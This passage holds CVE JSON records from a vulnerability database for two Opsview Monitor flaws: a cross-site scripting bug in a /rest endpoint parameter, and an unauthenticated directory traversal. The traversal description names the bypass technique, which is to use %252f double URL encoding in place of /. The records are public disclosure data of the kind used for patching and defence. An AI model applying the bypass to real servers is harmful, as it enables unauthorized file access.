"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "https://knowledge.opsview.com/v5.4/docs/whats-new"
},
{
"name": "20180904 [CORE-2018-0008] - Opsview Monitor Multiple Vulnerabilities",
"tags": [
"mailing-list",
"x_refsource_FULLDISC",
"x_transferred"
],
"url": "https://seclists.org/fulldisclosure/2018/Sep/3"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://www.coresecurity.com/advisories/opsview-monitor-multiple-vulnerabilities"
},
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "https://knowledge.opsview.com/v5.3/docs/whats-new"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"datePublic": "2018-09-04T00:00:00",
"descriptions": [
{
"lang": "en",
"value": "The diagnosticsb2ksy parameter of the /rest endpoint in Opsview Monitor before 5.3.1 and 5.4.x before 5.4.2 is vulnerable to Cross-Site Scripting."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2018-09-05T20:57:01",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://knowledge.opsview.com/v5.4/docs/whats-new"
},
{
"name": "20180904 [CORE-2018-0008] - Opsview Monitor Multiple Vulnerabilities",
"tags": [
"mailing-list",
"x_refsource_FULLDISC"
],
"url": "https://seclists.org/fulldisclosure/2018/Sep/3"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "https://www.coresecurity.com/advisories/opsview-monitor-multiple-vulnerabilities"
},
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://knowledge.opsview.com/v5.3/docs/whats-new"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2018-16148",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "The diagnosticsb2ksy parameter of the /rest endpoint in Opsview Monitor before 5.3.1 and 5.4.x before 5.4.2 is vulnerable to Cross-Site Scripting."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "https://knowledge.opsview.com/v5.4/docs/whats-new",
"refsource": "CONFIRM",
"url": "https://knowledge.opsview.com/v5.4/docs/whats-new"
},
{
"name": "20180904 [CORE-2018-0008] - Opsview Monitor Multiple Vulnerabilities",
"refsource": "FULLDISC",
"url": "https://seclists.org/fulldisclosure/2018/Sep/3"
},
{
"name": "https://www.coresecurity.com/advisories/opsview-monitor-multiple-vulnerabilities",
"refsource": "MISC",
"url": "https://www.coresecurity.com/advisories/opsview-monitor-multiple-vulnerabilities"
},
{
"name": "https://knowledge.opsview.com/v5.3/docs/whats-new",
"refsource": "CONFIRM",
"url": "https://knowledge.opsview.com/v5.3/docs/whats-new"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2018-16148",
"datePublished": "2018-09-05T21:00:00",
"dateReserved": "2018-08-29T00:00:00",
"dateUpdated": "2024-08-05T10:17:38.353Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2016-10367 (GCVE-0-2016-10367)
Vulnerability from nvd – Published: 2017-05-03 10:00 – Updated: 2024-09-16 19:19
- n/a
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-06T03:21:51.348Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://www.trustwave.com/Resources/Security-Advisories/Advisories/TWSL2016-016/?fid=8341"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In Opsview Monitor Pro (Prior to 5.1.0.162300841, prior to 5.0.2.27475, prior to 4.6.4.162391051, and 4.5.x without a certain 2016 security patch), an unauthenticated Directory Traversal vulnerability can be exploited by issuing a specially crafted HTTP GET request utilizing a simple URL encoding bypass, %252f instead of /."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2017-05-03T10:00:00Z",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"tags": [
"x_refsource_MISC"
],
"url": "https://www.trustwave.com/Resources/Security-Advisories/Advisories/TWSL2016-016/?fid=8341"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2016-10367",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "In Opsview Monitor Pro (Prior to 5.1.0.162300841, prior to 5.0.2.27475, prior to 4.6.4.162391051, and 4.5.x without a certain 2016 security patch), an unauthenticated Directory Traversal vulnerability can be exploited by issuing a specially crafted HTTP GET request utilizing a simple URL encoding bypass, %252f instead of /."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "https://www.trustwave.com/Resources/Security-Advisories/Advisories/TWSL2016-016/?fid=8341",
"refsource": "MISC",
"url": "https://www.trustwave.com/Resources/Security-Advisories/Advisories/TWSL2016-016/?fid=8341"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2016-10367",
"datePublished": "2017-05-03T10:00:00Z",
"dateReserved": "2017-05-03T00:00:00Z",
"dateUpdated": "2024-09-16T19:19:27.272Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}